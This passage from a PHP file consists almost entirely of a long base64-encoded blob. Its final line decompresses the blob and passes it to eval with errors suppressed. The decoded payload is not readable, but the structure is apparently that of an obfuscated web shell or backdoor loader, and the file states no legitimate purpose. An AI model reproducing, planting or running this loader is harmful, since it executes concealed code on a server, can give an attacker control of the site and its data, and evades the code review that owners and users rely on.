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";
@eval(gzinflate(base64_decode($code)));
?>